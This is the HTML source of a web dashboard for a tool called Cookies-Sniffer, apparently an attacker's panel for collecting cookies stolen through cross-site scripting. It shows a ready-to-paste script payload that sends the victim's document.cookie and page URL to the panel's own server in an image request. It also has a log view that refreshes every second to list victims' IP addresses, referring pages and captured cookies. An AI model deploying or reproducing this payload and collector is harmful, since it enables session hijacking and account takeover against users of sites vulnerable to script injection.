<!doctype html>
<html lang="en">
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Cookies-Sniffer - Dashbaord</title>
        <link href="/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="/assets/fontawesome/css/all.css" rel="stylesheet">
        <link rel="icon" href="/assets/img/favicons/favicon.png">
        <meta name="theme-color" content="#7952b3">
        <style>
            body {
                background-color: #1a1a1a!important;
            }

            .bd-placeholder-img {
                font-size: 1.125rem;
                text-anchor: middle;
                -webkit-user-select: none;
                -moz-user-select: none;
                user-select: none;
            }

            @media (min-width: 768px) {
                .bd-placeholder-img-lg {
                    font-size: 3.5rem;
                }
            }

            .white-border-color {
                border-color: #FFF;
            }

            .white-border-color:hover {
                background-color: #FFF;
                color: #000;
            }

            .white-color {
                color: #FFF;
            }

            .card-shadow{
                -webkit-box-shadow: 0px 0px 15px 1px rgba(0,0,0,0.75);
                -moz-box-shadow: 0px 0px 15px 1px rgba(0,0,0,0.75);
                box-shadow: 0px 0px 15px 1px rgba(0,0,0,0.75);
                border-radius: 0.50rem;
            }

            .code-blue {
                color: #0ec4ed!important;
            }
            .code-red {
                color: #e01f1f!important;
            }
            .code-yellow {
                color: #ded421!important;
            }
            .code-orange {
                color: #ff9500!important;
            }
        </style>
        <link href="offcanvas.css" rel="stylesheet">
    </head>
    <body>
        <nav class="navbar navbar-expand-lg fixed-top navbar-dark" style="background-color: #000000" aria-label="Main navigation">
            <div class="container-fluid">
                <a class="navbar-brand" href="#">Cookies-Sniffer <small style="font-size: 13px">( v1.3 )</small></a>
                <button class="navbar-toggler p-0 border-0" type="button" id="navbarSideCollapse" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
                </button>
                <div class="navbar-collapse offcanvas-collapse" id="navbarsExampleDefault">
                    <ul class="navbar-nav me-auto mb-2 mb-lg-0">
                        <li class="nav-item"></li>
                    </ul>
                    <a href="/auth/logout" class="btn btn-outline-success white-color white-border-color">
                        Logout&nbsp;<i class="fas fa-arrow-right"></i>
                    </a>
                </div>
            </div>
        </nav>
        <main class="container">
            <div class="row" style="padding-top: 15px;">
                <div class="col-4">
                    <div class="card">
                        <div class="card-header pb-2 mb-0"><h6>Payload</h6></div>
                        <div class="card-body">
                            <div class="card-shadow">
                                <div class="card-body">
                                    <div class="bg-dark text-white" style="border-radius: 0.5rem">
                                        <div class="card-body">
                                            <p>
                                                &lt;<span class="code-red">script</span>&gt;<br>
                                                &emsp;<span class="code-blue">var</span> _COOKIE <span class="code-red">=</span> document.cookie;<br>
                                                &emsp;<span class="code-blue">var</span> _HREF <span class="code-red">=</span> window.location.href;<br>
                                                &emsp;<span class="code-blue">var</span> _DOMAIN <span class="code-red">=</span> <span class="code-yellow">"http://<span id="props-input-domain"></span>:3000";</span><br>
                                                &emsp;<span class="code-blue">var</span> _URI <span class="code-red">=</span> <span class="code-yellow">"/api/v1/sniffer?pos=" <span class="code-red">+</span></span> _HREF<br>
                                                &emsp;<span class="code-blue">var</span> LINK <span class="code-red">=</span> _DOMAIN <span class="code-red">+</span> _URI <span class="code-red">+</span> <span class="code-yellow">"&cookies="</span> <span class="code-red">+</span> _COOKIE;<br>
                                                &emsp;document.<span class="code-blue">write</span>(<span class="code-yellow">`&lt;img src="<span class="text-white">${LINK}</span>"&gt;`</span>);<br>
                                                &lt;/<span class="code-red">script</span>&gt;<br>
                                            </p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-8">
                    <div class="card">
                        <div class="card-header pb-2 mb-0"><h6>Logs</h6></div>
                        <div class="card-body" id="props-output-logs">
                        </div>
                    </div>
                </div>
            </div>
        </main>
        <script src="/dist/js/bootstrap.bundle.min.js"></script>
        <script src="/dist/js/jquery.min.js"></script>
        <script>
            var dashboard = {
                RefreshLogs: function() {
                    $.ajax({
                        url: "/api/v1/logs",
                        method: "GET",
                        dataType: "json",
                        contentType: "application/json"
                    }).done(function(data) {
                        var json_data =  JSON.parse(JSON.stringify(data));
                        if (json_data.length !== 0) {
                            json_data.reverse().forEach( (item) => {
                                if ($('#log-' + item.tmp_id).length == 0) {
                                    $("#props-output-logs").html(`
                                        ${$("#props-output-logs").html()}
                                        <div class="d-flex text-muted pt-3">
                                            <div class="pb-3 mb-0 small lh-sm border-bottom w-100 card-shadow" id="log-${item.tmp_id}">
                                                <div class="card-body">
                                                    <div class="d-flex justify-content-between">
                                                        <strong class="text-gray-dark">${item.ip}&nbsp;<small>( ${item.timestamp} )</small></strong>
                                                    </div>
                                                    <br>
                                                    <p>From: <a href="${item.referer}">${item.referer}</a></p>
                                                    <div class="card-body">
                                                        <div class="bg-dark" style="border-radius: 0.5rem">
                                                            <div class="card-body">
                                                                <span class="code-yellow">${item.cookies}</span>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    `)
                                }
                            })
                        }
                    });
                }
            }

            setInterval( () => {
                dashboard.RefreshLogs() 
            }, 1000);

            (function () {
                'use strict'
                    $("#props-input-domain").html(document.location.hostname)
                    document.querySelector('#navbarSideCollapse').addEventListener('click', function () {
                    document.querySelector('.offcanvas-collapse').classList.toggle('open')
                })
            })()
        </script>
    </body>
</html>
